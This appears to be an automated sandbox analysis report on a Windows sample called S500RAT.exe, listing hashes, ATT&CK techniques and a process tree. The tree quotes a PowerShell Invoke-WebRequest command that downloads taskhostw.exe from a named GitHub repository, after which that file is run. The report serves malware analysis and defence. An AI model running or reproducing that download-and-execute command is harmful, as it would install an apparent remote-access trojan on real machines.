3ec85206a8c5d584c2cf4ab575bdd5cf4b29ed3a896032a1adc37f1c08507b31

Analysis

max time kernel
92s
max time network
94s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
15/07/2024, 01:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

S500RAT.exe
Size

18.0MB
MD5

5b52658c4517684971de10a6b7a67c30
SHA1

f0820c52617ebacaf53d8b8d97f1a42c712888bd
SHA256

3ec85206a8c5d584c2cf4ab575bdd5cf4b29ed3a896032a1adc37f1c08507b31
SHA512

ce96d25cfbb0d2c4addf242aa05c05909d7a883a70881df8336498b16913ec21bd64c07519eba89b2da90a05902fd7618e172a7602b985153eac09d9f226c8d6
SSDEEP

393216:o/dQeve921Fkv09cHJZwGn5GkPVtGhyyepDoSYYD4WchJ2sphHJG8:o1/LFkvPHJZwGn5dChyRpchNBJG8

Score

8^/10

execution upx

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
8	2212	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2212	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation	S500RAT.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1176-0-0x0000000000400000-0x0000000000439000-memory.dmp	upx
behavioral2/memory/1176-20-0x0000000000400000-0x0000000000439000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2212	powershell.exe
2212	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2212	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1176 wrote to memory of 4880	1176	S500RAT.exe	86
PID 1176 wrote to memory of 4880	1176	S500RAT.exe	86
PID 4880 wrote to memory of 2272	4880	cmd.exe	89
PID 4880 wrote to memory of 2272	4880	cmd.exe	89
PID 4880 wrote to memory of 2212	4880	cmd.exe	90
PID 4880 wrote to memory of 2212	4880	cmd.exe	90
PID 4880 wrote to memory of 3108	4880	cmd.exe	91
PID 4880 wrote to memory of 3108	4880	cmd.exe	91

C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
"C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1176
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B333.tmp\B334.tmp\B335.bat C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4880
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:2272
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell -Command "Invoke-WebRequest 'https://github.com/CVE-TEAMDSNH-20230611/20230611VNM/raw/main/taskhostw.exe' -OutFile taskhostw.exe"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2212
- - C:\Windows\system32\taskhostw.exe
    taskhostw.exe
    3⤵
    PID:3108

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\B333.tmp\B334.tmp\B335.bat

Filesize
1KB

MD5
fc4af7384f0b6f274dd3e745f0aceeaa

SHA1
31b310f869b15b84e52ef282cabaee974e5043cf

SHA256
f27a781bd4e8788990ceecac17ba4b9642e15f0d311e17d62c70db694c207a34

SHA512
dc7b542d89236105c8b8976e5af0e9e557eaa919adb2e8384b55b70c0b5bc6f00d2010538b9abaca90bb797d24fd509acdc1b3a6beea27f11405bf198349f57f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h3svmerh.nww.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1176-0-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/1176-20-0x0000000000400000-0x0000000000439000-memory.dmp

Filesize
228KB

Download
memory/2212-3-0x00007FFA7E703000-0x00007FFA7E705000-memory.dmp

Filesize
8KB

Download
memory/2212-9-0x0000023AD8560000-0x0000023AD8582000-memory.dmp

Filesize
136KB

Download
memory/2212-14-0x00007FFA7E700000-0x00007FFA7F1C1000-memory.dmp

Filesize
10.8MB

Download
memory/2212-15-0x00007FFA7E700000-0x00007FFA7F1C1000-memory.dmp

Filesize
10.8MB

Download
memory/2212-16-0x00007FFA7E700000-0x00007FFA7F1C1000-memory.dmp

Filesize
10.8MB

Download
memory/2212-19-0x00007FFA7E700000-0x00007FFA7F1C1000-memory.dmp

Filesize
10.8MB

Download